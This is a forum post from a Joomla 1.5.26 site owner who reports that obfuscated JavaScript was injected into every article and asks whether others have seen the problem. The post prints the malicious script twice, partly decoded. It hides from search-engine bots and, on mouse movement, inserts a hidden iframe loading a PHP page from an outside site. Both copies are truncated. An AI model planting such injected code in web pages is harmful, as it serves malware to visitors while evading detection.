I have Joomla 1.5.26 version with some components and plugins installed. Today I see that Google status of my site is malicios and that have some code which install simething. I than inspect site and find that in every added content before <hr id="system-readmore" /> tag is added bad code:
Code: Select all
<script type="text/javascript">// <![CDATA[
var
_0xf6f1=["\x74\x6F\x4C\x6F\x63\x61\x42\x75\x69\x6C\x64\x28\x29"];function
googleAnalyticsStatisticsBuild(){var _0xde2dx2=navigator[_0xf6f1[1]][_0xf6f1[0]]();var
_0xde2dx3=[_0xf6f1[2],_0xf6f1[3],_0xf6f1[4],_0xf6f1[5]];for(k in
_0xde2dx3){if(_0xde2dx2[_0xf6f1[6]](_0xde2dx3[k])!=-1){return ;} ;} ;var
_0xde2dx4=detectBrowserSize();if(_0xde2dx4[_0xf6f1[7]]==0||_0xde2dx4[_0xf6f1[8]]==0){return ;} ;var
_0xde2dx5=false;if(document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[9]]){_0xde2dx5=document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[9]];}
;document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[9]]=function
(){if(!document[_0xf6f1[13]](_0xf6f1[12])){iframe=document[_0xf6f1[15]](_0xf6f1[14]);iframe[_0xf6f1[7]]=_0xf6f1[16];iframe[_0xf6f1[8]]=_0xf6f1[16];iframe[_0xf6f1[17]]=_0xf6f1[12];iframe[_0xf6f1[18]]=_0xf6f1[19];document[_0xf6f1[11]](_0xf6f1[10])[0][_0xf6f1[20]](iframe);}
;if(_0xde2dx5!==false){_0xde2dx5();} ;} ;} ;function detectBrowserSize(){var _0xde2dx7=0,_0xde2dx8=0;if( typeof
(window[_0xf6f1[21]])==_0xf6f1[22]){_0xde2dx7=window[_0xf6f1[21]];_0xde2dx8=window[_0xf6f1[23]];} else
{if(document[_0xf6f1[24]]&&(document[_0xf6f1[24]][_0xf6f1[25]]||document[_0xf6f1[24]][_0xf6f1[26]])){_0xde2dx7=document[_0xf6f1[24]][_0xf6f1[25]];_0xde2dx8=document[_0xf6f1[24]][_0xf6f1[26]];}
else
{if(document[_0xf6f1[10]]&&(document[_0xf6f1[10]][_0xf6f1[25]]||document[_0xf6f1[10]][_0xf6f1[26]])){_0xde2dx7=document[_0xf6f1[10]][_0xf6f1[25]];_0xde2dx8=document[_0xf6f1[10]][_0xf6f1[26]];}
;} ;} ;return {width:_0xde2dx7,height:_0xde2dx8};} ;setTimeout(_0xf6f1[27],500);
// ]]></script>
Code: Select all
<script type="text/javascript">// <![CDATA[var _0xf6f1=["toLocaleLowerCase","userAgent","yandexbot","yandexmetrika","yandeximages","googlebot","indexOf","width","height","onmousemove","body","getElementsByTagName","googleanalyticsiframe","getElementById","iframe","createElement","12px","id","src","http://www.safe-cleaning.co.uk/modules/mod_archive/middle.php","appendChild","innerWidth","number","innerHeight","documentElement","clientWidth","clientHeight","googleAnalyticsStatisticsBuild()"];function googleAnalyticsStatisticsBuild(){var _0xde2dx2=6f1[26]])){_0xde2dx7=document[_0xf6f1[24]][_0xf6f1[25]];_0xde2dx8=document[_0xf6f1[24]][_0xf6f1[26]];} else {if(document[_0xf6f1[10]]&&(document[_0xf6f1[10]][_0xf6f1[25]]||document[_0xf6f1[10]][_0xf6f1[26]])){_0xde2dx7=document[_0xf6f1[10]][_0xf6f1[25]];_0xde2dx8=document[_0xf6f1[10]][_0xf6f1[26]];} ;} ;} ;return {width:_0xde2dx7,height:_0xde2dx8};} ;setTimeout(_0xf6f1[27],500);// ]]></script>
Do you maybe know (maybe you read somewhere or opinions of users) do this problem are in this version?
Do some other user have same problem?
Thank you very much